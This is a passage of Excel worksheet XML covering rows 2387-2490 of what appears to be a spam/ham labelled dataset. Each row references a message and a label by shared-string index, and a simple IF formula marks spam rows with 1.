    <row r="2387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2387" t="s">
        <v>7582</v>
      </c>
      <c r="B2387" t="s">
        <v>5297</v>
      </c>
      <c r="C2387" s="1">
        <f>IF(B2387="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2388" t="s">
        <v>7583</v>
      </c>
      <c r="B2388" t="s">
        <v>5294</v>
      </c>
      <c r="C2388" s="1">
        <f>IF(B2388="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2389" t="s">
        <v>7584</v>
      </c>
      <c r="B2389" t="s">
        <v>5294</v>
      </c>
      <c r="C2389" s="1">
        <f>IF(B2389="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2390" t="s">
        <v>7585</v>
      </c>
      <c r="B2390" t="s">
        <v>5294</v>
      </c>
      <c r="C2390" s="1">
        <f>IF(B2390="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2391" t="s">
        <v>7586</v>
      </c>
      <c r="B2391" t="s">
        <v>5294</v>
      </c>
      <c r="C2391" s="1">
        <f>IF(B2391="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2392" t="s">
        <v>7587</v>
      </c>
      <c r="B2392" t="s">
        <v>5294</v>
      </c>
      <c r="C2392" s="1">
        <f>IF(B2392="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2393" t="s">
        <v>7588</v>
      </c>
      <c r="B2393" t="s">
        <v>5294</v>
      </c>
      <c r="C2393" s="1">
        <f>IF(B2393="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2394" t="s">
        <v>7589</v>
      </c>
      <c r="B2394" t="s">
        <v>5294</v>
      </c>
      <c r="C2394" s="1">
        <f>IF(B2394="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2395" t="s">
        <v>7590</v>
      </c>
      <c r="B2395" t="s">
        <v>5294</v>
      </c>
      <c r="C2395" s="1">
        <f>IF(B2395="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2396" t="s">
        <v>7591</v>
      </c>
      <c r="B2396" t="s">
        <v>5294</v>
      </c>
      <c r="C2396" s="1">
        <f>IF(B2396="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2397" t="s">
        <v>7592</v>
      </c>
      <c r="B2397" t="s">
        <v>5294</v>
      </c>
      <c r="C2397" s="1">
        <f>IF(B2397="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2398" t="s">
        <v>7593</v>
      </c>
      <c r="B2398" t="s">
        <v>5294</v>
      </c>
      <c r="C2398" s="1">
        <f>IF(B2398="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2399" t="s">
        <v>7594</v>
      </c>
      <c r="B2399" t="s">
        <v>5294</v>
      </c>
      <c r="C2399" s="1">
        <f>IF(B2399="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2400" t="s">
        <v>7595</v>
      </c>
      <c r="B2400" t="s">
        <v>5294</v>
      </c>
      <c r="C2400" s="1">
        <f>IF(B2400="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2401" t="s">
        <v>7596</v>
      </c>
      <c r="B2401" t="s">
        <v>5294</v>
      </c>
      <c r="C2401" s="1">
        <f>IF(B2401="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2402" t="s">
        <v>7597</v>
      </c>
      <c r="B2402" t="s">
        <v>5294</v>
      </c>
      <c r="C2402" s="1">
        <f>IF(B2402="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2403" t="s">
        <v>7598</v>
      </c>
      <c r="B2403" t="s">
        <v>5297</v>
      </c>
      <c r="C2403" s="1">
        <f>IF(B2403="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2404" t="s">
        <v>7599</v>
      </c>
      <c r="B2404" t="s">
        <v>5294</v>
      </c>
      <c r="C2404" s="1">
        <f>IF(B2404="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2405" t="s">
        <v>7600</v>
      </c>
      <c r="B2405" t="s">
        <v>5294</v>
      </c>
      <c r="C2405" s="1">
        <f>IF(B2405="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2406" t="s">
        <v>7601</v>
      </c>
      <c r="B2406" t="s">
        <v>5294</v>
      </c>
      <c r="C2406" s="1">
        <f>IF(B2406="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2407" t="s">
        <v>7602</v>
      </c>
      <c r="B2407" t="s">
        <v>5294</v>
      </c>
      <c r="C2407" s="1">
        <f>IF(B2407="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2408" t="s">
        <v>7603</v>
      </c>
      <c r="B2408" t="s">
        <v>5294</v>
      </c>
      <c r="C2408" s="1">
        <f>IF(B2408="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2409" t="s">
        <v>7604</v>
      </c>
      <c r="B2409" t="s">
        <v>5294</v>
      </c>
      <c r="C2409" s="1">
        <f>IF(B2409="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2410" t="s">
        <v>7605</v>
      </c>
      <c r="B2410" t="s">
        <v>5294</v>
      </c>
      <c r="C2410" s="1">
        <f>IF(B2410="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2411" t="s">
        <v>7606</v>
      </c>
      <c r="B2411" t="s">
        <v>5294</v>
      </c>
      <c r="C2411" s="1">
        <f>IF(B2411="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2412" t="s">
        <v>7607</v>
      </c>
      <c r="B2412" t="s">
        <v>5294</v>
      </c>
      <c r="C2412" s="1">
        <f>IF(B2412="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2413" t="s">
        <v>7608</v>
      </c>
      <c r="B2413" t="s">
        <v>5294</v>
      </c>
      <c r="C2413" s="1">
        <f>IF(B2413="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2414" t="s">
        <v>6408</v>
      </c>
      <c r="B2414" t="s">
        <v>5297</v>
      </c>
      <c r="C2414" s="1">
        <f>IF(B2414="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2415" t="s">
        <v>7609</v>
      </c>
      <c r="B2415" t="s">
        <v>5294</v>
      </c>
      <c r="C2415" s="1">
        <f>IF(B2415="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2416" t="s">
        <v>7610</v>
      </c>
      <c r="B2416" t="s">
        <v>5294</v>
      </c>
      <c r="C2416" s="1">
        <f>IF(B2416="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2417" t="s">
        <v>7611</v>
      </c>
      <c r="B2417" t="s">
        <v>5294</v>
      </c>
      <c r="C2417" s="1">
        <f>IF(B2417="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2418" t="s">
        <v>7612</v>
      </c>
      <c r="B2418" t="s">
        <v>5294</v>
      </c>
      <c r="C2418" s="1">
        <f>IF(B2418="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2419" t="s">
        <v>7613</v>
      </c>
      <c r="B2419" t="s">
        <v>5294</v>
      </c>
      <c r="C2419" s="1">
        <f>IF(B2419="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2420" t="s">
        <v>7614</v>
      </c>
      <c r="B2420" t="s">
        <v>5294</v>
      </c>
      <c r="C2420" s="1">
        <f>IF(B2420="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2421" t="s">
        <v>7615</v>
      </c>
      <c r="B2421" t="s">
        <v>5297</v>
      </c>
      <c r="C2421" s="1">
        <f>IF(B2421="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2422" t="s">
        <v>7616</v>
      </c>
      <c r="B2422" t="s">
        <v>5294</v>
      </c>
      <c r="C2422" s="1">
        <f>IF(B2422="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2423" t="s">
        <v>7617</v>
      </c>
      <c r="B2423" t="s">
        <v>5294</v>
      </c>
      <c r="C2423" s="1">
        <f>IF(B2423="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2424" t="s">
        <v>7618</v>
      </c>
      <c r="B2424" t="s">
        <v>5294</v>
      </c>
      <c r="C2424" s="1">
        <f>IF(B2424="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2425" t="s">
        <v>7619</v>
      </c>
      <c r="B2425" t="s">
        <v>5294</v>
      </c>
      <c r="C2425" s="1">
        <f>IF(B2425="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2426" t="s">
        <v>7620</v>
      </c>
      <c r="B2426" t="s">
        <v>5294</v>
      </c>
      <c r="C2426" s="1">
        <f>IF(B2426="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2427" t="s">
        <v>7621</v>
      </c>
      <c r="B2427" t="s">
        <v>5294</v>
      </c>
      <c r="C2427" s="1">
        <f>IF(B2427="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2428" t="s">
        <v>7622</v>
      </c>
      <c r="B2428" t="s">
        <v>5297</v>
      </c>
      <c r="C2428" s="1">
        <f>IF(B2428="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2429" t="s">
        <v>7623</v>
      </c>
      <c r="B2429" t="s">
        <v>5294</v>
      </c>
      <c r="C2429" s="1">
        <f>IF(B2429="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2430" t="s">
        <v>7624</v>
      </c>
      <c r="B2430" t="s">
        <v>5294</v>
      </c>
      <c r="C2430" s="1">
        <f>IF(B2430="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2431" t="s">
        <v>7625</v>
      </c>
      <c r="B2431" t="s">
        <v>5297</v>
      </c>
      <c r="C2431" s="1">
        <f>IF(B2431="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2432" t="s">
        <v>7626</v>
      </c>
      <c r="B2432" t="s">
        <v>5294</v>
      </c>
      <c r="C2432" s="1">
        <f>IF(B2432="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2433" t="s">
        <v>7627</v>
      </c>
      <c r="B2433" t="s">
        <v>5294</v>
      </c>
      <c r="C2433" s="1">
        <f>IF(B2433="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2434" t="s">
        <v>7628</v>
      </c>
      <c r="B2434" t="s">
        <v>5294</v>
      </c>
      <c r="C2434" s="1">
        <f>IF(B2434="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2435" t="s">
        <v>7629</v>
      </c>
      <c r="B2435" t="s">
        <v>5294</v>
      </c>
      <c r="C2435" s="1">
        <f>IF(B2435="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2436" t="s">
        <v>7630</v>
      </c>
      <c r="B2436" t="s">
        <v>5294</v>
      </c>
      <c r="C2436" s="1">
        <f>IF(B2436="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2437" t="s">
        <v>7631</v>
      </c>
      <c r="B2437" t="s">
        <v>5294</v>
      </c>
      <c r="C2437" s="1">
        <f>IF(B2437="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2438" t="s">
        <v>7632</v>
      </c>
      <c r="B2438" t="s">
        <v>5294</v>
      </c>
      <c r="C2438" s="1">
        <f>IF(B2438="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2439" t="s">
        <v>7633</v>
      </c>
      <c r="B2439" t="s">
        <v>5297</v>
      </c>
      <c r="C2439" s="1">
        <f>IF(B2439="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2440" t="s">
        <v>7634</v>
      </c>
      <c r="B2440" t="s">
        <v>5294</v>
      </c>
      <c r="C2440" s="1">
        <f>IF(B2440="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2441" t="s">
        <v>7635</v>
      </c>
      <c r="B2441" t="s">
        <v>5294</v>
      </c>
      <c r="C2441" s="1">
        <f>IF(B2441="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2442" t="s">
        <v>7636</v>
      </c>
      <c r="B2442" t="s">
        <v>5294</v>
      </c>
      <c r="C2442" s="1">
        <f>IF(B2442="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2443" t="s">
        <v>7637</v>
      </c>
      <c r="B2443" t="s">
        <v>5294</v>
      </c>
      <c r="C2443" s="1">
        <f>IF(B2443="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2444" t="s">
        <v>7638</v>
      </c>
      <c r="B2444" t="s">
        <v>5294</v>
      </c>
      <c r="C2444" s="1">
        <f>IF(B2444="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2445" t="s">
        <v>7639</v>
      </c>
      <c r="B2445" t="s">
        <v>5294</v>
      </c>
      <c r="C2445" s="1">
        <f>IF(B2445="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2446" t="s">
        <v>7640</v>
      </c>
      <c r="B2446" t="s">
        <v>5294</v>
      </c>
      <c r="C2446" s="1">
        <f>IF(B2446="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2447" t="s">
        <v>7641</v>
      </c>
      <c r="B2447" t="s">
        <v>5294</v>
      </c>
      <c r="C2447" s="1">
        <f>IF(B2447="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2448" t="s">
        <v>5376</v>
      </c>
      <c r="B2448" t="s">
        <v>5294</v>
      </c>
      <c r="C2448" s="1">
        <f>IF(B2448="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2449" t="s">
        <v>7642</v>
      </c>
      <c r="B2449" t="s">
        <v>5294</v>
      </c>
      <c r="C2449" s="1">
        <f>IF(B2449="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2450" t="s">
        <v>7643</v>
      </c>
      <c r="B2450" t="s">
        <v>5294</v>
      </c>
      <c r="C2450" s="1">
        <f>IF(B2450="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2451" t="s">
        <v>7644</v>
      </c>
      <c r="B2451" t="s">
        <v>5294</v>
      </c>
      <c r="C2451" s="1">
        <f>IF(B2451="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2452" t="s">
        <v>7645</v>
      </c>
      <c r="B2452" t="s">
        <v>5294</v>
      </c>
      <c r="C2452" s="1">
        <f>IF(B2452="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2453" t="s">
        <v>7646</v>
      </c>
      <c r="B2453" t="s">
        <v>5294</v>
      </c>
      <c r="C2453" s="1">
        <f>IF(B2453="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2454" t="s">
        <v>7647</v>
      </c>
      <c r="B2454" t="s">
        <v>5294</v>
      </c>
      <c r="C2454" s="1">
        <f>IF(B2454="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2455" t="s">
        <v>7648</v>
      </c>
      <c r="B2455" t="s">
        <v>5294</v>
      </c>
      <c r="C2455" s="1">
        <f>IF(B2455="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2456" t="s">
        <v>7649</v>
      </c>
      <c r="B2456" t="s">
        <v>5294</v>
      </c>
      <c r="C2456" s="1">
        <f>IF(B2456="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2457" t="s">
        <v>7650</v>
      </c>
      <c r="B2457" t="s">
        <v>5294</v>
      </c>
      <c r="C2457" s="1">
        <f>IF(B2457="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2458" t="s">
        <v>7651</v>
      </c>
      <c r="B2458" t="s">
        <v>5294</v>
      </c>
      <c r="C2458" s="1">
        <f>IF(B2458="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2459" t="s">
        <v>7652</v>
      </c>
      <c r="B2459" t="s">
        <v>5294</v>
      </c>
      <c r="C2459" s="1">
        <f>IF(B2459="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2460" t="s">
        <v>7653</v>
      </c>
      <c r="B2460" t="s">
        <v>5294</v>
      </c>
      <c r="C2460" s="1">
        <f>IF(B2460="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2461" t="s">
        <v>7654</v>
      </c>
      <c r="B2461" t="s">
        <v>5294</v>
      </c>
      <c r="C2461" s="1">
        <f>IF(B2461="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2462" t="s">
        <v>7655</v>
      </c>
      <c r="B2462" t="s">
        <v>5294</v>
      </c>
      <c r="C2462" s="1">
        <f>IF(B2462="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2463" t="s">
        <v>7656</v>
      </c>
      <c r="B2463" t="s">
        <v>5294</v>
      </c>
      <c r="C2463" s="1">
        <f>IF(B2463="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2464" t="s">
        <v>7657</v>
      </c>
      <c r="B2464" t="s">
        <v>5294</v>
      </c>
      <c r="C2464" s="1">
        <f>IF(B2464="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2465" t="s">
        <v>7658</v>
      </c>
      <c r="B2465" t="s">
        <v>5294</v>
      </c>
      <c r="C2465" s="1">
        <f>IF(B2465="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2466" t="s">
        <v>7659</v>
      </c>
      <c r="B2466" t="s">
        <v>5294</v>
      </c>
      <c r="C2466" s="1">
        <f>IF(B2466="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2467" t="s">
        <v>7660</v>
      </c>
      <c r="B2467" t="s">
        <v>5294</v>
      </c>
      <c r="C2467" s="1">
        <f>IF(B2467="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2468" t="s">
        <v>7661</v>
      </c>
      <c r="B2468" t="s">
        <v>5294</v>
      </c>
      <c r="C2468" s="1">
        <f>IF(B2468="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2469" t="s">
        <v>7662</v>
      </c>
      <c r="B2469" t="s">
        <v>5294</v>
      </c>
      <c r="C2469" s="1">
        <f>IF(B2469="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2470" t="s">
        <v>7663</v>
      </c>
      <c r="B2470" t="s">
        <v>5294</v>
      </c>
      <c r="C2470" s="1">
        <f>IF(B2470="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2471" t="s">
        <v>7664</v>
      </c>
      <c r="B2471" t="s">
        <v>5294</v>
      </c>
      <c r="C2471" s="1">
        <f>IF(B2471="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2472" t="s">
        <v>7665</v>
      </c>
      <c r="B2472" t="s">
        <v>5294</v>
      </c>
      <c r="C2472" s="1">
        <f>IF(B2472="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2473" t="s">
        <v>7666</v>
      </c>
      <c r="B2473" t="s">
        <v>5294</v>
      </c>
      <c r="C2473" s="1">
        <f>IF(B2473="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2474" t="s">
        <v>7313</v>
      </c>
      <c r="B2474" t="s">
        <v>5297</v>
      </c>
      <c r="C2474" s="1">
        <f>IF(B2474="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2475" t="s">
        <v>7667</v>
      </c>
      <c r="B2475" t="s">
        <v>5294</v>
      </c>
      <c r="C2475" s="1">
        <f>IF(B2475="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2476" t="s">
        <v>7668</v>
      </c>
      <c r="B2476" t="s">
        <v>5294</v>
      </c>
      <c r="C2476" s="1">
        <f>IF(B2476="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2477" t="s">
        <v>7669</v>
      </c>
      <c r="B2477" t="s">
        <v>5294</v>
      </c>
      <c r="C2477" s="1">
        <f>IF(B2477="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2478" t="s">
        <v>6635</v>
      </c>
      <c r="B2478" t="s">
        <v>5294</v>
      </c>
      <c r="C2478" s="1">
        <f>IF(B2478="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2479" t="s">
        <v>7670</v>
      </c>
      <c r="B2479" t="s">
        <v>5294</v>
      </c>
      <c r="C2479" s="1">
        <f>IF(B2479="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2480" t="s">
        <v>7671</v>
      </c>
      <c r="B2480" t="s">
        <v>5294</v>
      </c>
      <c r="C2480" s="1">
        <f>IF(B2480="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2481" t="s">
        <v>7672</v>
      </c>
      <c r="B2481" t="s">
        <v>5297</v>
      </c>
      <c r="C2481" s="1">
        <f>IF(B2481="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2482" t="s">
        <v>7673</v>
      </c>
      <c r="B2482" t="s">
        <v>5297</v>
      </c>
      <c r="C2482" s="1">
        <f>IF(B2482="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2483" t="s">
        <v>7674</v>
      </c>
      <c r="B2483" t="s">
        <v>5294</v>
      </c>
      <c r="C2483" s="1">
        <f>IF(B2483="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2484" t="s">
        <v>7675</v>
      </c>
      <c r="B2484" t="s">
        <v>5294</v>
      </c>
      <c r="C2484" s="1">
        <f>IF(B2484="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2485" t="s">
        <v>7676</v>
      </c>
      <c r="B2485" t="s">
        <v>5294</v>
      </c>
      <c r="C2485" s="1">
        <f>IF(B2485="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2486" t="s">
        <v>7677</v>
      </c>
      <c r="B2486" t="s">
        <v>5294</v>
      </c>
      <c r="C2486" s="1">
        <f>IF(B2486="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2487" t="s">
        <v>7678</v>
      </c>
      <c r="B2487" t="s">
        <v>5294</v>
      </c>
      <c r="C2487" s="1">
        <f>IF(B2487="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2488" t="s">
        <v>7679</v>
      </c>
      <c r="B2488" t="s">
        <v>5294</v>
      </c>
      <c r="C2488" s="1">
        <f>IF(B2488="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2489" t="s">
        <v>7680</v>
      </c>
      <c r="B2489" t="s">
        <v>5294</v>
      </c>
      <c r="C2489" s="1">
        <f>IF(B2489="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2490" t="s">
        <v>7681</v>
      </c>
      <c r="B2490" t="s">
        <v>5294</v>
      </c>
      <c r="C2490" s="1">
        <f>IF(B2490="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
